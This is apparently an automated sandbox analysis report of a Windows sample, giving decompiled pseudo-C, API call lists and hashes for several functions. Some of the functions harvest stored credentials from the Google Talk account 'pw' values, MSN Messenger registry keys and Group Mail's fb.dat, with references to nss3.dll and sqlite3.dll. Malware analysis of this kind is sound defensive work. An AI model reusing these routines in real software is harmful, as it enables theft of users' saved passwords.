                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004034CB, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t23;
				char* _t28;

				_t23 = __ecx;
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
				if(_t15 != 0) {
					strcpy( &_v268,  &_v532);
					_t28 =  &_v268;
					E00405F1F(_t28);
					strcat(_t28, "fb.dat");
					return E004033D7(_t28, __fp0, _a4);
				}
				return _t15;
			}












                                                                                              0x004034cb
                                                                                              0x004034e4
                                                                                              0x004034eb
                                                                                              0x004034fa
                                                                                              0x00403501
                                                                                              0x00403521
                                                                                              0x0040352b
                                                                                              0x0040353c
                                                                                              0x00403541
                                                                                              0x00403547
                                                                                              0x00403554
                                                                                              0x00000000
                                                                                              0x00403566
                                                                                              0x00403569

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004034EB
                                                                                              • memset.MSVCRT ref: 00403501
                                                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                              • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                                                                • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
                                                                                                • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                                                              • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetstrcat$Closestrcpystrlen
                                                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                              • API String ID: 1387626053-966475738
                                                                                              • Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                                              • Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
                                                                                              • Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                                              • Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040754D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
				void* _v0;
				char _v4;
				long _t29;
				void* _t33;
				void* _t36;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t50 = __ecx;
				E004118A0(0x1110, __ecx);
				E0040724C(_a4); // executed
				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
				_t56 = (_t54 & 0xfffffff8) + 0xc;
				if(_t29 == 0) {
					_a4 = 0;
					_a12 = 0;
					memset( &_a13, 0, 0xff);
					_t57 = _t56 + 0xc;
					_t33 = E0040EC05(_v0, 0,  &_a12);
					while(1) {
						_t58 = _t57 + 0xc;
						if(_t33 != 0) {
							break;
						}
						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
						_t57 = _t58 + 0xc;
						if(_t36 == 0) {
							_a268 = 0;
							memset( &_a269, 0, 0xfff);
							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
							_t57 = _t57 + 0x18;
							E00407406( &_a268, _a4,  &_a12);
							RegCloseKey(_v0);
						}
						_a4 = _a4 + 1;
						_t33 = E0040EC05(_v0, _a4,  &_a12);
					}
					_t29 = RegCloseKey(_v0);
				}
				return _t29;
			}












                                                                                              0x0040754d
                                                                                              0x00407558
                                                                                              0x00407562
                                                                                              0x00407576
                                                                                              0x0040757b
                                                                                              0x00407580
                                                                                              0x00407593
                                                                                              0x00407597
                                                                                              0x0040759b
                                                                                              0x004075a0
                                                                                              0x004075ad
                                                                                              0x00407642
                                                                                              0x00407642
                                                                                              0x00407647
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004075cb
                                                                                              0x004075d0
                                                                                              0x004075d5
                                                                                              0x004075e5
                                                                                              0x004075ec
                                                                                              0x0040760a
                                                                                              0x0040760f
                                                                                              0x00407621
                                                                                              0x0040762a
                                                                                              0x0040762a
                                                                                              0x0040762c
                                                                                              0x0040763d
                                                                                              0x0040763d
                                                                                              0x00407651
                                                                                              0x00407651
                                                                                              0x00407658

                                                                                              APIs
                                                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                                                                • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                                                                • Part of subcall function 0040724C: GetComputerNameA.KERNEL32(?,?), ref: 00407313
                                                                                                • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                                • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                                • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                                • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                                                                • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                                                                • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              • memset.MSVCRT ref: 0040759B
                                                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                              • memset.MSVCRT ref: 004075EC
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                                                              Strings
                                                                                              • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                              • String ID: Software\Google\Google Talk\Accounts
                                                                                              • API String ID: 2959138223-1079885057
                                                                                              • Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                                              • Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
                                                                                              • Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                                              • Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A5AC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 64%
                                                                                              			E0040A5AC(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t26;
				void* _t31;
				intOrPtr _t34;
				char* _t44;
				void* _t45;
				intOrPtr* _t46;
				int _t47;

				_t45 = __eax;
				_t37 =  *((intOrPtr*)(__eax + 0x37c));
				_t47 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
					do {
						_t31 = E00406DEB(_t47, _t37);
						_push(_t31);
						_push("/sort");
						L004115C4();
						if(_t31 == 0) {
							_t4 = _t47 + 1; // 0x1
							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
							_t54 =  *_t44 - 0x7e;
							_t34 =  *((intOrPtr*)(_t45 + 0x370));
							if( *_t44 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t44 = _t44 + 1;
							}
							_push(_t44);
							E0040A119(_t34, _t54);
						}
						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
						_t47 = _t47 + 1;
					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
				}
				E00405E2C();
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
					_t46 =  *((intOrPtr*)(_t45 + 0x370));
					if( *0x41748c == 0) {
						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
						 *0x41748c = 1;
					}
					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
				}
				return SetCursor( *0x416b98);
			}











                                                                                              0x0040a5af
                                                                                              0x0040a5b1
                                                                                              0x0040a5b9
                                                                                              0x0040a5be
                                                                                              0x0040a5c0
                                                                                              0x0040a5c2
                                                                                              0x0040a5c7
                                                                                              0x0040a5c8
                                                                                              0x0040a5cd
                                                                                              0x0040a5d6
                                                                                              0x0040a5de
                                                                                              0x0040a5e6
                                                                                              0x0040a5e8
                                                                                              0x0040a5eb
                                                                                              0x0040a5f1
                                                                                              0x0040a5f8
                                                                                              0x0040a5f3
                                                                                              0x0040a5f3
                                                                                              0x0040a5f5
                                                                                              0x0040a5f5
                                                                                              0x0040a5f9
                                                                                              0x0040a5fa
                                                                                              0x0040a5fa
                                                                                              0x0040a5ff
                                                                                              0x0040a605
                                                                                              0x0040a606
                                                                                              0x0040a5c0
                                                                                              0x0040a60b
                                                                                              0x0040a616
                                                                                              0x0040a621
                                                                                              0x0040a637
                                                                                              0x0040a63f
                                                                                              0x0040a645
                                                                                              0x0040a64d
                                                                                              0x0040a652
                                                                                              0x0040a652
                                                                                              0x0040a668
                                                                                              0x0040a676
                                                                                              0x0040a67b
                                                                                              0x0040a68d

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Cursor_mbsicmpqsort
                                                                                              • String ID: /nosort$/sort
                                                                                              • API String ID: 882979914-1578091866
                                                                                              • Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                                              • Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
                                                                                              • Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                                              • Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040EE59, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registrystringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 25%
                                                                                              			E0040EE59(char* __edi, void* __esi) {
				void* _v8;
				char _v40;
				void _v299;
				char _v300;
				void* _t32;
				char* _t37;
				void* _t38;

				_t38 = __esi;
				_t37 = __edi;
				E0040EDAC();
				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
					_v300 = 0;
					memset( &_v299, 0, 0x103);
					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000002);
					} else {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000001);
					}
					if(E0040EB3F() == 0) {
						E0040EDDB(_t38);
						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
						RegCloseKey(_v8);
					}
					strcpy(_t37,  &_v300);
					return 0 |  *_t37 != 0x00000000;
				} else {
					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
					return _t32;
				}
			}










                                                                                              0x0040ee59
                                                                                              0x0040ee59
                                                                                              0x0040ee63
                                                                                              0x0040ee70
                                                                                              0x0040eea8
                                                                                              0x0040eeae
                                                                                              0x0040eeb9
                                                                                              0x0040eec8
                                                                                              0x0040eec9
                                                                                              0x0040eece
                                                                                              0x0040eed5
                                                                                              0x0040eed8
                                                                                              0x0040eed9
                                                                                              0x0040eede
                                                                                              0x0040eede
                                                                                              0x0040eeed
                                                                                              0x0040eef4
                                                                                              0x0040ef0c
                                                                                              0x0040ef17
                                                                                              0x0040ef17
                                                                                              0x0040ef25
                                                                                              0x00000000
                                                                                              0x0040ee8c
                                                                                              0x0040ee90
                                                                                              0x00000000
                                                                                              0x0040ee90

                                                                                              APIs
                                                                                                • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,75144DE0,?,00000000), ref: 0040EDBA
                                                                                                • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                              • memset.MSVCRT ref: 0040EEAE
                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                              • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                                • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                              • API String ID: 181880968-2036018995
                                                                                              • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                              • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
                                                                                              • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                              • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040396C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v528;
				intOrPtr _v540;
				char _v796;
				char _v1052;
				void* _v1056;
				void* _v1060;
				int _v1064;
				void* __ebx;
				void* __esi;
				void* _t21;
				long _t23;
				void** _t24;
				long _t26;
				int _t32;
				void* _t52;

				_t52 = __fp0;
				_v540 = 0x412e80;
				E004046D7( &_v528);
				_t32 = 0;
				_v1052 = 0;
				_v796 = 0;
				_v1064 = 0;
				do {
					if(_v1064 != _t32) {
						__eflags = _v1064 - 1;
						if(__eflags != 0) {
							_t21 = E0040D5DB( &_v1052, __eflags); // executed
						} else {
							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
							__eflags = _t23;
							if(_t23 != 0) {
								goto L5;
							} else {
								_t24 =  &_v1060;
								goto L4;
							}
						}
					} else {
						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
						if(_t26 != 0) {
							L5:
							_t21 = 0;
						} else {
							_t24 =  &_v1056;
							L4:
							_t21 = E0040D4A6( &_v1052, _t24);
						}
					}
					_t32 = 0;
					if(_t21 != 0) {
						E004038CF(_t52, _a4,  &_v1052);
					}
					_v1064 = _v1064 + 1;
				} while (_v1064 <= 2);
				return E004047F1( &_v528);
			}


















                                                                                              0x0040396c
                                                                                              0x00403982
                                                                                              0x0040398d
                                                                                              0x00403998
                                                                                              0x0040399a
                                                                                              0x0040399e
                                                                                              0x004039a5
                                                                                              0x004039ae
                                                                                              0x004039b2
                                                                                              0x004039df
                                                                                              0x004039e4
                                                                                              0x00403a07
                                                                                              0x004039e6
                                                                                              0x004039f7
                                                                                              0x004039f9
                                                                                              0x004039fb
                                                                                              0x00000000
                                                                                              0x004039fd
                                                                                              0x004039fd
                                                                                              0x00000000
                                                                                              0x004039fd
                                                                                              0x004039fb
                                                                                              0x004039b4
                                                                                              0x004039c5
                                                                                              0x004039c9
                                                                                              0x004039db
                                                                                              0x004039db
                                                                                              0x004039cb
                                                                                              0x004039cb
                                                                                              0x004039cf
                                                                                              0x004039d4
                                                                                              0x004039d4
                                                                                              0x004039c9
                                                                                              0x00403a0c
                                                                                              0x00403a10
                                                                                              0x00403a1a
                                                                                              0x00403a1a
                                                                                              0x00403a1f
                                                                                              0x00403a23
                                                                                              0x00403a3c

                                                                                              APIs
                                                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                                                                • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                                • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                                                                • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                                • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                                                              Strings
                                                                                              • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                                                              • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                              • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                                              • API String ID: 1910562259-1741179510
                                                                                              • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                              • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                                                              • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                              • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040ED0B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceA(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								 *0x417110 =  *0x417110 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}











                                                                                              0x0040ed18
                                                                                              0x0040ed1e
                                                                                              0x0040ed22
                                                                                              0x0040ed2f
                                                                                              0x0040ed33
                                                                                              0x0040ed39
                                                                                              0x0040ed41
                                                                                              0x0040ed44
                                                                                              0x0040ed4c
                                                                                              0x0040ed50
                                                                                              0x0040ed53
                                                                                              0x0040ed56
                                                                                              0x0040ed58
                                                                                              0x0040ed58
                                                                                              0x0040ed5c
                                                                                              0x0040ed5f
                                                                                              0x0040ed6f
                                                                                              0x0040ed71
                                                                                              0x0040ed75
                                                                                              0x0040ed75
                                                                                              0x0040ed79
                                                                                              0x0040ed83
                                                                                              0x0040ed83
                                                                                              0x0040ed4c
                                                                                              0x0040ed41
                                                                                              0x0040ed88
                                                                                              0x0040ed8e

                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                                                              • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                              • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                                                              • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                              • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040EA72, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 95%
                                                                                              			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
				void _v8199;
				char _v8200;
				void* __ebx;
				int _t23;
				CHAR* _t31;

				E004118A0(0x2004, __ecx);
				_v8200 = 0;
				if(_a4 == 0) {
					memset( &_v8199, 0, 0x2000);
					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
					_t23 = E004067DC( &_v8200, __edi, _a16);
				} else {
					memset( &_v8199, 0, 0x2000);
					_t31 =  &_v8200;
					E00406763(_t31, _a16,  *__edi);
					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
				}
				return _t23;
			}








                                                                                              0x0040ea7a
                                                                                              0x0040ea85
                                                                                              0x0040ea8b
                                                                                              0x0040ead5
                                                                                              0x0040eaf3
                                                                                              0x0040eb03
                                                                                              0x0040ea8d
                                                                                              0x0040ea9a
                                                                                              0x0040eaa1
                                                                                              0x0040eaaa
                                                                                              0x0040eabe
                                                                                              0x0040eabe
                                                                                              0x0040eb0d

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040EA9A
                                                                                                • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                                                                • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                                                              • memset.MSVCRT ref: 0040EAD5
                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3143880245-0
                                                                                              • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                              • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                                                              • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                              • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B785, Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				struct HICON__* _t19;
				intOrPtr* _t23;
				void* _t25;

				_t23 = __ebx;
				_t14 = __eax;
				 *((intOrPtr*)(__ebx + 0x124)) = 0;
				 *__ebx = 0x41356c;
				 *((intOrPtr*)(__ebx + 0x258)) = 0;
				_push(0x14);
				 *((intOrPtr*)(__ebx + 0x374)) = 0;
				L004115D0();
				if(__eax == 0) {
					_t14 = 0;
					__eflags = 0;
				} else {
					 *0x417114 = __eax;
				}
				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
				L004115D0(); // executed
				_t32 = _t14;
				_t25 = 0xf38;
				if(_t14 == 0) {
					_t15 = 0;
					__eflags = 0;
				} else {
					_t15 = E00404016(_t14, _t32);
				}
				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
				 *((intOrPtr*)(_t23 + 0x378)) = 0;
				 *((intOrPtr*)(_t23 + 0x260)) = 0;
				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
				 *((intOrPtr*)(_t23 + 0x154)) = 0;
				_t16 =  *(_t23 + 0x258);
				if(_t16 != 0) {
					DeleteObject(_t16);
					 *(_t23 + 0x258) = 0;
				}
				_t17 = E00406252(); // executed
				 *(_t23 + 0x258) = _t17;
				E00401000(_t25, _t23 + 0x158, 0x413480);
				_t19 = LoadIconA( *0x416b94, 0x65); // executed
				E004017A4(_t23, _t19);
				return _t23;
			}












                                                                                              0x0040b785
                                                                                              0x0040b785
                                                                                              0x0040b789
                                                                                              0x0040b78f
                                                                                              0x0040b795
                                                                                              0x0040b79b
                                                                                              0x0040b79d
                                                                                              0x0040b7a3
                                                                                              0x0040b7ab
                                                                                              0x0040b7b4
                                                                                              0x0040b7b4
                                                                                              0x0040b7ad
                                                                                              0x0040b7ad
                                                                                              0x0040b7ad
                                                                                              0x0040b7bb
                                                                                              0x0040b7c1
                                                                                              0x0040b7c6
                                                                                              0x0040b7c8
                                                                                              0x0040b7c9
                                                                                              0x0040b7d4
                                                                                              0x0040b7d4
                                                                                              0x0040b7cb
                                                                                              0x0040b7cd
                                                                                              0x0040b7cd
                                                                                              0x0040b7d6
                                                                                              0x0040b7dc
                                                                                              0x0040b7e2
                                                                                              0x0040b7e8
                                                                                              0x0040b7ee
                                                                                              0x0040b7f4
                                                                                              0x0040b7fc
                                                                                              0x0040b7ff
                                                                                              0x0040b805
                                                                                              0x0040b805
                                                                                              0x0040b80b
                                                                                              0x0040b81b
                                                                                              0x0040b821
                                                                                              0x0040b82e
                                                                                              0x0040b837
                                                                                              0x0040b840

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
